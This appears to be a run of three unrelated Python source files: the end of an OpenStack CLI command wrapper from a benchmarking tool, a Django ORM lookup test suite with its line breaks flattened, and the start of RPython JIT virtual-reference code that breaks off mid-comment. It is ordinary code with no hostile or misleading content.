    def __repr__(self):
        return '{0}({1})'.format(type(self).__name__,
                                 ' '.join(self._GetCommand()))

    def _GetCommand(self):
        """Generates the openstack cli command.

        Returns:
          list of strings. When joined by spaces, forms the openstack cli command.
        """
        cmd = [FLAGS.openstack_cli_path]
        cmd.extend(self.args)
        for flag_name, values in six.iteritems(self.flags):
            flag_name_str = '--%s' % flag_name
            if values is True:
                cmd.append(flag_name_str)
            else:
                values_iterable = values if isinstance(values, list) else [values]
                for value in values_iterable:
                    cmd.append(flag_name_str)
                    cmd.append(str(value))
        cmd.extend(self.additional_flags)
        return cmd

    def Issue(self, **kwargs):
        """Tries running the openstack cli command once.

        Args:
          **kwargs: Keyword arguments to forward to vm_util.IssueCommand when
              issuing the openstack cli command.

        Returns:
          A tuple of stdout, stderr, and retcode from running the openstack
          command.
        """
        if 'raise_on_failure' not in kwargs:
            kwargs['raise_on_failure'] = False
        return vm_util.IssueCommand(self._GetCommand(), **kwargs)

    def IssueRetryable(self, **kwargs):
        """Tries running the openstack cli command until it succeeds or times out.

        Args:
          **kwargs: Keyword arguments to forward to vm_util.IssueRetryableCommand
              when issuing the openstack cli command.

        Returns:
          (stdout, stderr) pair of strings from running the openstack command.
        """
        return vm_util.IssueRetryableCommand(self._GetCommand(), **kwargs)

    def _AddCommonFlags(self, resource):
        """Adds common flags to the command.

        Adds common openstack flags derived from the PKB flags and provided
        resource.

        Args:
          resource: An OpenStack resource of type BaseResource.
        """
        self.flags['format'] = 'json'
        self.additional_flags.extend(FLAGS.openstack_additional_flags or ())
the-stack_106_24396
from __future__ import unicode_literals from datetime import datetime from operator import attrgetter from django.core.exceptions import FieldError from django.test import TestCase, skipUnlessDBFeature from .models import Author, Article, Tag, Game, Season, Player class LookupTests(TestCase): def setUp(self): # Create a few Authors. self.au1 = Author(name='Author 1') self.au1.save() self.au2 = Author(name='Author 2') self.au2.save() # Create a couple of Articles. self.a1 = Article(headline='Article 1', pub_date=datetime(2005, 7, 26), author=self.au1) self.a1.save() self.a2 = Article(headline='Article 2', pub_date=datetime(2005, 7, 27), author=self.au1) self.a2.save() self.a3 = Article(headline='Article 3', pub_date=datetime(2005, 7, 27), author=self.au1) self.a3.save() self.a4 = Article(headline='Article 4', pub_date=datetime(2005, 7, 28), author=self.au1) self.a4.save() self.a5 = Article(headline='Article 5', pub_date=datetime(2005, 8, 1, 9, 0), author=self.au2) self.a5.save() self.a6 = Article(headline='Article 6', pub_date=datetime(2005, 8, 1, 8, 0), author=self.au2) self.a6.save() self.a7 = Article(headline='Article 7', pub_date=datetime(2005, 7, 27), author=self.au2) self.a7.save() # Create a few Tags. self.t1 = Tag(name='Tag 1') self.t1.save() self.t1.articles.add(self.a1, self.a2, self.a3) self.t2 = Tag(name='Tag 2') self.t2.save() self.t2.articles.add(self.a3, self.a4, self.a5) self.t3 = Tag(name='Tag 3') self.t3.save() self.t3.articles.add(self.a5, self.a6, self.a7) def test_exists(self): # We can use .exists() to check that there are some self.assertTrue(Article.objects.exists()) for a in Article.objects.all(): a.delete() # There should be none now! self.assertFalse(Article.objects.exists()) def test_lookup_int_as_str(self): # Integer value can be queried using string self.assertQuerysetEqual(Article.objects.filter(id__iexact=str(self.a1.id)), ['<Article: Article 1>']) @skipUnlessDBFeature('supports_date_lookup_using_string') def test_lookup_date_as_str(self): # A date lookup can be performed using a string search self.assertQuerysetEqual(Article.objects.filter(pub_date__startswith='2005'), [ '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) def test_iterator(self): # Each QuerySet gets iterator(), which is a generator that "lazily" # returns results using database-level iteration. self.assertQuerysetEqual(Article.objects.iterator(), [ 'Article 5', 'Article 6', 'Article 4', 'Article 2', 'Article 3', 'Article 7', 'Article 1', ], transform=attrgetter('headline')) # iterator() can be used on any QuerySet. self.assertQuerysetEqual( Article.objects.filter(headline__endswith='4').iterator(), ['Article 4'], transform=attrgetter('headline')) def test_count(self): # count() returns the number of objects matching search criteria. self.assertEqual(Article.objects.count(), 7) self.assertEqual(Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).count(), 3) self.assertEqual(Article.objects.filter(headline__startswith='Blah blah').count(), 0) # count() should respect sliced query sets. articles = Article.objects.all() self.assertEqual(articles.count(), 7) self.assertEqual(articles[:4].count(), 4) self.assertEqual(articles[1:100].count(), 6) self.assertEqual(articles[10:100].count(), 0) # Date and date/time lookups can also be done with strings. 
self.assertEqual(Article.objects.filter(pub_date__exact='2005-07-27 00:00:00').count(), 3) def test_in_bulk(self): # in_bulk() takes a list of IDs and returns a dictionary mapping IDs to objects. arts = Article.objects.in_bulk([self.a1.id, self.a2.id]) self.assertEqual(arts[self.a1.id], self.a1) self.assertEqual(arts[self.a2.id], self.a2) self.assertEqual(Article.objects.in_bulk([self.a3.id]), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk(set([self.a3.id])), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk(frozenset([self.a3.id])), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk((self.a3.id,)), {self.a3.id: self.a3}) self.assertEqual(Article.objects.in_bulk([1000]), {}) self.assertEqual(Article.objects.in_bulk([]), {}) self.assertEqual(Article.objects.in_bulk(iter([self.a1.id])), {self.a1.id: self.a1}) self.assertEqual(Article.objects.in_bulk(iter([])), {}) self.assertRaises(TypeError, Article.objects.in_bulk) self.assertRaises(TypeError, Article.objects.in_bulk, headline__startswith='Blah') def test_values(self): # values() returns a list of dictionaries instead of object instances -- # and you can specify which fields you want to retrieve. identity = lambda x: x self.assertQuerysetEqual(Article.objects.values('headline'), [ {'headline': 'Article 5'}, {'headline': 'Article 6'}, {'headline': 'Article 4'}, {'headline': 'Article 2'}, {'headline': 'Article 3'}, {'headline': 'Article 7'}, {'headline': 'Article 1'}, ], transform=identity) self.assertQuerysetEqual( Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).values('id'), [{'id': self.a2.id}, {'id': self.a3.id}, {'id': self.a7.id}], transform=identity) self.assertQuerysetEqual(Article.objects.values('id', 'headline'), [ {'id': self.a5.id, 'headline': 'Article 5'}, {'id': self.a6.id, 'headline': 'Article 6'}, {'id': self.a4.id, 'headline': 'Article 4'}, {'id': self.a2.id, 'headline': 'Article 2'}, {'id': self.a3.id, 'headline': 'Article 3'}, {'id': self.a7.id, 'headline': 'Article 7'}, {'id': self.a1.id, 'headline': 'Article 1'}, ], transform=identity) # You can use values() with iterator() for memory savings, # because iterator() uses database-level iteration. self.assertQuerysetEqual(Article.objects.values('id', 'headline').iterator(), [ {'headline': 'Article 5', 'id': self.a5.id}, {'headline': 'Article 6', 'id': self.a6.id}, {'headline': 'Article 4', 'id': self.a4.id}, {'headline': 'Article 2', 'id': self.a2.id}, {'headline': 'Article 3', 'id': self.a3.id}, {'headline': 'Article 7', 'id': self.a7.id}, {'headline': 'Article 1', 'id': self.a1.id}, ], transform=identity) # The values() method works with "extra" fields specified in extra(select). 
self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id + 1'}).values('id', 'id_plus_one'), [ {'id': self.a5.id, 'id_plus_one': self.a5.id + 1}, {'id': self.a6.id, 'id_plus_one': self.a6.id + 1}, {'id': self.a4.id, 'id_plus_one': self.a4.id + 1}, {'id': self.a2.id, 'id_plus_one': self.a2.id + 1}, {'id': self.a3.id, 'id_plus_one': self.a3.id + 1}, {'id': self.a7.id, 'id_plus_one': self.a7.id + 1}, {'id': self.a1.id, 'id_plus_one': self.a1.id + 1}, ], transform=identity) data = { 'id_plus_one': 'id+1', 'id_plus_two': 'id+2', 'id_plus_three': 'id+3', 'id_plus_four': 'id+4', 'id_plus_five': 'id+5', 'id_plus_six': 'id+6', 'id_plus_seven': 'id+7', 'id_plus_eight': 'id+8', } self.assertQuerysetEqual( Article.objects.filter(id=self.a1.id).extra(select=data).values(*data.keys()), [{ 'id_plus_one': self.a1.id + 1, 'id_plus_two': self.a1.id + 2, 'id_plus_three': self.a1.id + 3, 'id_plus_four': self.a1.id + 4, 'id_plus_five': self.a1.id + 5, 'id_plus_six': self.a1.id + 6, 'id_plus_seven': self.a1.id + 7, 'id_plus_eight': self.a1.id + 8, }], transform=identity) # You can specify fields from forward and reverse relations, just like filter(). self.assertQuerysetEqual( Article.objects.values('headline', 'author__name'), [ {'headline': self.a5.headline, 'author__name': self.au2.name}, {'headline': self.a6.headline, 'author__name': self.au2.name}, {'headline': self.a4.headline, 'author__name': self.au1.name}, {'headline': self.a2.headline, 'author__name': self.au1.name}, {'headline': self.a3.headline, 'author__name': self.au1.name}, {'headline': self.a7.headline, 'author__name': self.au2.name}, {'headline': self.a1.headline, 'author__name': self.au1.name}, ], transform=identity) self.assertQuerysetEqual( Author.objects.values('name', 'article__headline').order_by('name', 'article__headline'), [ {'name': self.au1.name, 'article__headline': self.a1.headline}, {'name': self.au1.name, 'article__headline': self.a2.headline}, {'name': self.au1.name, 'article__headline': self.a3.headline}, {'name': self.au1.name, 'article__headline': self.a4.headline}, {'name': self.au2.name, 'article__headline': self.a5.headline}, {'name': self.au2.name, 'article__headline': self.a6.headline}, {'name': self.au2.name, 'article__headline': self.a7.headline}, ], transform=identity) self.assertQuerysetEqual( Author.objects.values('name', 'article__headline', 'article__tag__name').order_by('name', 'article__headline', 'article__tag__name'), [ {'name': self.au1.name, 'article__headline': self.a1.headline, 'article__tag__name': self.t1.name}, {'name': self.au1.name, 'article__headline': self.a2.headline, 'article__tag__name': self.t1.name}, {'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t1.name}, {'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t2.name}, {'name': self.au1.name, 'article__headline': self.a4.headline, 'article__tag__name': self.t2.name}, {'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t2.name}, {'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t3.name}, {'name': self.au2.name, 'article__headline': self.a6.headline, 'article__tag__name': self.t3.name}, {'name': self.au2.name, 'article__headline': self.a7.headline, 'article__tag__name': self.t3.name}, ], transform=identity) # However, an exception FieldDoesNotExist will be thrown if you specify # a non-existent field name in values() (a field that is neither in the # model nor in 
extra(select)). self.assertRaises(FieldError, Article.objects.extra(select={'id_plus_one': 'id + 1'}).values, 'id', 'id_plus_two') # If you don't specify field names to values(), all are returned. self.assertQuerysetEqual(Article.objects.filter(id=self.a5.id).values(), [{ 'id': self.a5.id, 'author_id': self.au2.id, 'headline': 'Article 5', 'pub_date': datetime(2005, 8, 1, 9, 0) }], transform=identity) def test_values_list(self): # values_list() is similar to values(), except that the results are # returned as a list of tuples, rather than a list of dictionaries. # Within each tuple, the order of the elements is the same as the order # of fields in the values_list() call. identity = lambda x: x self.assertQuerysetEqual(Article.objects.values_list('headline'), [ ('Article 5',), ('Article 6',), ('Article 4',), ('Article 2',), ('Article 3',), ('Article 7',), ('Article 1',), ], transform=identity) self.assertQuerysetEqual(Article.objects.values_list('id').order_by('id'), [(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)], transform=identity) self.assertQuerysetEqual( Article.objects.values_list('id', flat=True).order_by('id'), [self.a1.id, self.a2.id, self.a3.id, self.a4.id, self.a5.id, self.a6.id, self.a7.id], transform=identity) self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id+1'}) .order_by('id').values_list('id'), [(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)], transform=identity) self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id+1'}) .order_by('id').values_list('id_plus_one', 'id'), [ (self.a1.id + 1, self.a1.id), (self.a2.id + 1, self.a2.id), (self.a3.id + 1, self.a3.id), (self.a4.id + 1, self.a4.id), (self.a5.id + 1, self.a5.id), (self.a6.id + 1, self.a6.id), (self.a7.id + 1, self.a7.id) ], transform=identity) self.assertQuerysetEqual( Article.objects.extra(select={'id_plus_one': 'id+1'}) .order_by('id').values_list('id', 'id_plus_one'), [ (self.a1.id, self.a1.id + 1), (self.a2.id, self.a2.id + 1), (self.a3.id, self.a3.id + 1), (self.a4.id, self.a4.id + 1), (self.a5.id, self.a5.id + 1), (self.a6.id, self.a6.id + 1), (self.a7.id, self.a7.id + 1) ], transform=identity) self.assertQuerysetEqual( Author.objects.values_list('name', 'article__headline', 'article__tag__name').order_by('name', 'article__headline', 'article__tag__name'), [ (self.au1.name, self.a1.headline, self.t1.name), (self.au1.name, self.a2.headline, self.t1.name), (self.au1.name, self.a3.headline, self.t1.name), (self.au1.name, self.a3.headline, self.t2.name), (self.au1.name, self.a4.headline, self.t2.name), (self.au2.name, self.a5.headline, self.t2.name), (self.au2.name, self.a5.headline, self.t3.name), (self.au2.name, self.a6.headline, self.t3.name), (self.au2.name, self.a7.headline, self.t3.name), ], transform=identity) self.assertRaises(TypeError, Article.objects.values_list, 'id', 'headline', flat=True) def test_get_next_previous_by(self): # Every DateField and DateTimeField creates get_next_by_FOO() and # get_previous_by_FOO() methods. In the case of identical date values, # these methods will use the ID as a fallback check. This guarantees # that no records are skipped or duplicated. 
self.assertEqual(repr(self.a1.get_next_by_pub_date()), '<Article: Article 2>') self.assertEqual(repr(self.a2.get_next_by_pub_date()), '<Article: Article 3>') self.assertEqual(repr(self.a2.get_next_by_pub_date(headline__endswith='6')), '<Article: Article 6>') self.assertEqual(repr(self.a3.get_next_by_pub_date()), '<Article: Article 7>') self.assertEqual(repr(self.a4.get_next_by_pub_date()), '<Article: Article 6>') self.assertRaises(Article.DoesNotExist, self.a5.get_next_by_pub_date) self.assertEqual(repr(self.a6.get_next_by_pub_date()), '<Article: Article 5>') self.assertEqual(repr(self.a7.get_next_by_pub_date()), '<Article: Article 4>') self.assertEqual(repr(self.a7.get_previous_by_pub_date()), '<Article: Article 3>') self.assertEqual(repr(self.a6.get_previous_by_pub_date()), '<Article: Article 4>') self.assertEqual(repr(self.a5.get_previous_by_pub_date()), '<Article: Article 6>') self.assertEqual(repr(self.a4.get_previous_by_pub_date()), '<Article: Article 7>') self.assertEqual(repr(self.a3.get_previous_by_pub_date()), '<Article: Article 2>') self.assertEqual(repr(self.a2.get_previous_by_pub_date()), '<Article: Article 1>') def test_escaping(self): # Underscores, percent signs and backslashes have special meaning in the # underlying SQL code, but Django handles the quoting of them automatically. a8 = Article(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20)) a8.save() self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article'), [ '<Article: Article_ with underscore>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article_'), ['<Article: Article_ with underscore>']) a9 = Article(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21)) a9.save() self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article'), [ '<Article: Article% with percent sign>', '<Article: Article_ with underscore>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__startswith='Article%'), ['<Article: Article% with percent sign>']) a10 = Article(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22)) a10.save() self.assertQuerysetEqual(Article.objects.filter(headline__contains='\\'), ['<Article: Article with \ backslash>']) def test_exclude(self): Article.objects.create(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20)) Article.objects.create(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21)) Article.objects.create(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22)) # exclude() is the opposite of filter() when doing lookups: self.assertQuerysetEqual( Article.objects.filter(headline__contains='Article').exclude(headline__contains='with'), [ '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.exclude(headline__startswith="Article_"), [ '<Article: Article with \\ backslash>', '<Article: Article% with percent sign>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 
7>', '<Article: Article 1>', ]) self.assertQuerysetEqual(Article.objects.exclude(headline="Article 7"), [ '<Article: Article with \\ backslash>', '<Article: Article% with percent sign>', '<Article: Article_ with underscore>', '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 1>', ]) def test_none(self): # none() returns a QuerySet that behaves like any other QuerySet object self.assertQuerysetEqual(Article.objects.none(), []) self.assertQuerysetEqual( Article.objects.none().filter(headline__startswith='Article'), []) self.assertQuerysetEqual( Article.objects.filter(headline__startswith='Article').none(), []) self.assertEqual(Article.objects.none().count(), 0) self.assertEqual( Article.objects.none().update(headline="This should not take effect"), 0) self.assertQuerysetEqual( [article for article in Article.objects.none().iterator()], []) def test_in(self): # using __in with an empty list should return an empty query set self.assertQuerysetEqual(Article.objects.filter(id__in=[]), []) self.assertQuerysetEqual(Article.objects.exclude(id__in=[]), [ '<Article: Article 5>', '<Article: Article 6>', '<Article: Article 4>', '<Article: Article 2>', '<Article: Article 3>', '<Article: Article 7>', '<Article: Article 1>', ]) def test_error_messages(self): # Programming errors are pointed out with nice error messages try: Article.objects.filter(pub_date_year='2005').count() self.fail('FieldError not raised') except FieldError as ex: self.assertEqual(str(ex), "Cannot resolve keyword 'pub_date_year' " "into field. Choices are: author, author_id, headline, " "id, pub_date, tag") try: Article.objects.filter(headline__starts='Article') self.fail('FieldError not raised') except FieldError as ex: self.assertEqual( str(ex), "Unsupported lookup 'starts' for CharField " "or join on the field not permitted.") def test_regex(self): # Create some articles with a bit more interesting headlines for testing field lookups: for a in Article.objects.all(): a.delete() now = datetime.now() a1 = Article(pub_date=now, headline='f') a1.save() a2 = Article(pub_date=now, headline='fo') a2.save() a3 = Article(pub_date=now, headline='foo') a3.save() a4 = Article(pub_date=now, headline='fooo') a4.save() a5 = Article(pub_date=now, headline='hey-Foo') a5.save() a6 = Article(pub_date=now, headline='bar') a6.save() a7 = Article(pub_date=now, headline='AbBa') a7.save() a8 = Article(pub_date=now, headline='baz') a8.save() a9 = Article(pub_date=now, headline='baxZ') a9.save() # zero-or-more self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'fo*'), ['<Article: f>', '<Article: fo>', '<Article: foo>', '<Article: fooo>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'fo*'), [ '<Article: f>', '<Article: fo>', '<Article: foo>', '<Article: fooo>', '<Article: hey-Foo>', ]) # one-or-more self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'fo+'), ['<Article: fo>', '<Article: foo>', '<Article: fooo>']) # wildcard self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'fooo?'), ['<Article: foo>', '<Article: fooo>']) # leading anchor self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'^b'), ['<Article: bar>', '<Article: baxZ>', '<Article: baz>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'^a'), ['<Article: AbBa>']) # trailing anchor self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'z$'), ['<Article: baz>']) 
self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'z$'), ['<Article: baxZ>', '<Article: baz>']) # character sets self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'ba[rz]'), ['<Article: bar>', '<Article: baz>']) self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'ba.[RxZ]'), ['<Article: baxZ>']) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'ba[RxZ]'), ['<Article: bar>', '<Article: baxZ>', '<Article: baz>']) # and more articles: a10 = Article(pub_date=now, headline='foobar') a10.save() a11 = Article(pub_date=now, headline='foobaz') a11.save() a12 = Article(pub_date=now, headline='ooF') a12.save() a13 = Article(pub_date=now, headline='foobarbaz') a13.save() a14 = Article(pub_date=now, headline='zoocarfaz') a14.save() a15 = Article(pub_date=now, headline='barfoobaz') a15.save() a16 = Article(pub_date=now, headline='bazbaRFOO') a16.save() # alternation self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'oo(f|b)'), [ '<Article: barfoobaz>', '<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'oo(f|b)'), [ '<Article: barfoobaz>', '<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>', '<Article: ooF>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'^foo(f|b)'), ['<Article: foobar>', '<Article: foobarbaz>', '<Article: foobaz>']) # greedy matching self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'b.*az'), [ '<Article: barfoobaz>', '<Article: baz>', '<Article: bazbaRFOO>', '<Article: foobarbaz>', '<Article: foobaz>', ]) self.assertQuerysetEqual(Article.objects.filter(headline__iregex=r'b.*ar'), [ '<Article: bar>', '<Article: barfoobaz>', '<Article: bazbaRFOO>', '<Article: foobar>', '<Article: foobarbaz>', ]) @skipUnlessDBFeature('supports_regex_backreferencing') def test_regex_backreferencing(self): # grouping and backreferences now = datetime.now() a10 = Article(pub_date=now, headline='foobar') a10.save() a11 = Article(pub_date=now, headline='foobaz') a11.save() a12 = Article(pub_date=now, headline='ooF') a12.save() a13 = Article(pub_date=now, headline='foobarbaz') a13.save() a14 = Article(pub_date=now, headline='zoocarfaz') a14.save() a15 = Article(pub_date=now, headline='barfoobaz') a15.save() a16 = Article(pub_date=now, headline='bazbaRFOO') a16.save() self.assertQuerysetEqual(Article.objects.filter(headline__regex=r'b(.).*b\1'), ['<Article: barfoobaz>', '<Article: bazbaRFOO>', '<Article: foobarbaz>']) def test_regex_null(self): """ Ensure that a regex lookup does not fail on null/None values """ Season.objects.create(year=2012, gt=None) self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^$'), []) def test_regex_non_string(self): """ Ensure that a regex lookup does not fail on non-string fields """ Season.objects.create(year=2013, gt=444) self.assertQuerysetEqual(Season.objects.filter(gt__regex=r'^444$'), ['<Season: 2013>']) def test_regex_non_ascii(self): """ Ensure that a regex lookup does not trip on non-ASCII characters. """ Player.objects.create(name='\u2660') Player.objects.get(name__regex='\u2660') def test_nonfield_lookups(self): """ Ensure that a lookup query containing non-fields raises the proper exception. 
""" with self.assertRaises(FieldError): Article.objects.filter(headline__blahblah=99) with self.assertRaises(FieldError): Article.objects.filter(headline__blahblah__exact=99) with self.assertRaises(FieldError): Article.objects.filter(blahblah=99) def test_lookup_collision(self): """ Ensure that genuine field names don't collide with built-in lookup types ('year', 'gt', 'range', 'in' etc.). Refs #11670. """ # Here we're using 'gt' as a code number for the year, e.g. 111=>2009. season_2009 = Season.objects.create(year=2009, gt=111) season_2009.games.create(home="Houston Astros", away="St. Louis Cardinals") season_2010 = Season.objects.create(year=2010, gt=222) season_2010.games.create(home="Houston Astros", away="Chicago Cubs") season_2010.games.create(home="Houston Astros", away="Milwaukee Brewers") season_2010.games.create(home="Houston Astros", away="St. Louis Cardinals") season_2011 = Season.objects.create(year=2011, gt=333) season_2011.games.create(home="Houston Astros", away="St. Louis Cardinals") season_2011.games.create(home="Houston Astros", away="Milwaukee Brewers") hunter_pence = Player.objects.create(name="Hunter Pence") hunter_pence.games = Game.objects.filter(season__year__in=[2009, 2010]) pudge = Player.objects.create(name="Ivan Rodriquez") pudge.games = Game.objects.filter(season__year=2009) pedro_feliz = Player.objects.create(name="Pedro Feliz") pedro_feliz.games = Game.objects.filter(season__year__in=[2011]) johnson = Player.objects.create(name="Johnson") johnson.games = Game.objects.filter(season__year__in=[2011]) # Games in 2010 self.assertEqual(Game.objects.filter(season__year=2010).count(), 3) self.assertEqual(Game.objects.filter(season__year__exact=2010).count(), 3) self.assertEqual(Game.objects.filter(season__gt=222).count(), 3) self.assertEqual(Game.objects.filter(season__gt__exact=222).count(), 3) # Games in 2011 self.assertEqual(Game.objects.filter(season__year=2011).count(), 2) self.assertEqual(Game.objects.filter(season__year__exact=2011).count(), 2) self.assertEqual(Game.objects.filter(season__gt=333).count(), 2) self.assertEqual(Game.objects.filter(season__gt__exact=333).count(), 2) self.assertEqual(Game.objects.filter(season__year__gt=2010).count(), 2) self.assertEqual(Game.objects.filter(season__gt__gt=222).count(), 2) # Games played in 2010 and 2011 self.assertEqual(Game.objects.filter(season__year__in=[2010, 2011]).count(), 5) self.assertEqual(Game.objects.filter(season__year__gt=2009).count(), 5) self.assertEqual(Game.objects.filter(season__gt__in=[222, 333]).count(), 5) self.assertEqual(Game.objects.filter(season__gt__gt=111).count(), 5) # Players who played in 2009 self.assertEqual(Player.objects.filter(games__season__year=2009).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__year__exact=2009).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt=111).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt__exact=111).distinct().count(), 2) # Players who played in 2010 self.assertEqual(Player.objects.filter(games__season__year=2010).distinct().count(), 1) self.assertEqual(Player.objects.filter(games__season__year__exact=2010).distinct().count(), 1) self.assertEqual(Player.objects.filter(games__season__gt=222).distinct().count(), 1) self.assertEqual(Player.objects.filter(games__season__gt__exact=222).distinct().count(), 1) # Players who played in 2011 self.assertEqual(Player.objects.filter(games__season__year=2011).distinct().count(), 2) 
self.assertEqual(Player.objects.filter(games__season__year__exact=2011).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt=333).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__year__gt=2010).distinct().count(), 2) self.assertEqual(Player.objects.filter(games__season__gt__gt=222).distinct().count(), 2)
the-stack_106_24397
from rpython.rtyper.rmodel import inputconst, log from rpython.rtyper.lltypesystem import lltype, llmemory, rclass from rpython.jit.metainterp import history from rpython.jit.codewriter import heaptracker from rpython.rlib.jit import InvalidVirtualRef class VirtualRefInfo: def __init__(self, warmrunnerdesc): self.warmrunnerdesc = warmrunnerdesc self.cpu = warmrunnerdesc.cpu # we make the low-level type of an RPython class directly self.JIT_VIRTUAL_REF = lltype.GcStruct('JitVirtualRef', ('super', rclass.OBJECT), ('virtual_token', lltype.Signed), ('forced', rclass.OBJECTPTR)) self.jit_virtual_ref_vtable = lltype.malloc(rclass.OBJECT_VTABLE, zero=True, flavor='raw', immortal=True) self.jit_virtual_ref_vtable.name = rclass.alloc_array_name( 'jit_virtual_ref') # build some constants adr = llmemory.cast_ptr_to_adr(self.jit_virtual_ref_vtable) adr = heaptracker.adr2int(adr) self.jit_virtual_ref_const_class = history.ConstInt(adr) fielddescrof = self.cpu.fielddescrof self.descr_virtual_token = fielddescrof(self.JIT_VIRTUAL_REF, 'virtual_token') self.descr_forced = fielddescrof(self.JIT_VIRTUAL_REF, 'forced') # # record the type JIT_VIRTUAL_REF explicitly in the rtyper, too if hasattr(self.warmrunnerdesc, 'rtyper'): # <-- for tests self.warmrunnerdesc.rtyper.set_type_for_typeptr( self.jit_virtual_ref_vtable, self.JIT_VIRTUAL_REF) def _freeze_(self): return True def replace_force_virtual_with_call(self, graphs): # similar to rvirtualizable2.replace_force_virtualizable_with_call(). c_force_virtual_ptr = None c_is_virtual_ptr = None force_virtual_count = 0 for graph in graphs: for block in graph.iterblocks(): for op in block.operations: if op.opname == 'jit_force_virtual': # first compute c_funcptr, but only if there is any # 'jit_force_virtual' around if c_force_virtual_ptr is None: c_force_virtual_ptr = self.get_force_virtual_fnptr() # op.opname = 'direct_call' op.args = [c_force_virtual_ptr, op.args[0]] force_virtual_count += 1 # if op.opname == 'jit_is_virtual': if c_is_virtual_ptr is None: c_is_virtual_ptr = self.get_is_virtual_fnptr() # op.opname = 'direct_call' op.args = [c_is_virtual_ptr, op.args[0]] # if c_force_virtual_ptr is not None: log("replaced %d 'jit_force_virtual' with %r" % (force_virtual_count, c_force_virtual_ptr.value)) # ____________________________________________________________ # The 'virtual_token' field has the same meaning as the 'vable_token' field # of a virtualizable. It is equal to: # * -3 (TOKEN_NONE) when tracing, except as described below; # * -1 (TOKEN_TRACING_RESCALL) during tracing when we do a residual call; # * addr in the CPU stack (set by FORCE_TOKEN) when running the assembler; # * -3 (TOKEN_NONE) after the virtual is forced, if it is forced at all. 
TOKEN_NONE = -3 TOKEN_TRACING_RESCALL = -1 def virtual_ref_during_tracing(self, real_object): assert real_object vref = lltype.malloc(self.JIT_VIRTUAL_REF) p = lltype.cast_pointer(rclass.OBJECTPTR, vref) p.typeptr = self.jit_virtual_ref_vtable vref.virtual_token = self.TOKEN_NONE vref.forced = lltype.cast_opaque_ptr(rclass.OBJECTPTR, real_object) return lltype.cast_opaque_ptr(llmemory.GCREF, vref) def is_virtual_ref(self, gcref): if not gcref: return False inst = lltype.cast_opaque_ptr(rclass.OBJECTPTR, gcref) return inst.typeptr == self.jit_virtual_ref_vtable def tracing_before_residual_call(self, gcref): if not self.is_virtual_ref(gcref): return vref = lltype.cast_opaque_ptr(lltype.Ptr(self.JIT_VIRTUAL_REF), gcref) assert vref.virtual_token == self.TOKEN_NONE vref.virtual_token = self.TOKEN_TRACING_RESCALL def tracing_after_residual_call(self, gcref): if not self.is_virtual_ref(gcref): return False vref = lltype.cast_opaque_ptr(lltype.Ptr(self.JIT_VIRTUAL_REF), gcref) assert vref.forced if vref.virtual_token != self.TOKEN_NONE: # not modified by the residual call; assert that it is still # set to TOKEN_TRACING_RESCALL and clear it. assert vref.virtual_token == self.TOKEN_TRACING_RESCALL vref.virtual_token = self.TOKEN_NONE return False else: # marker "modified during residual 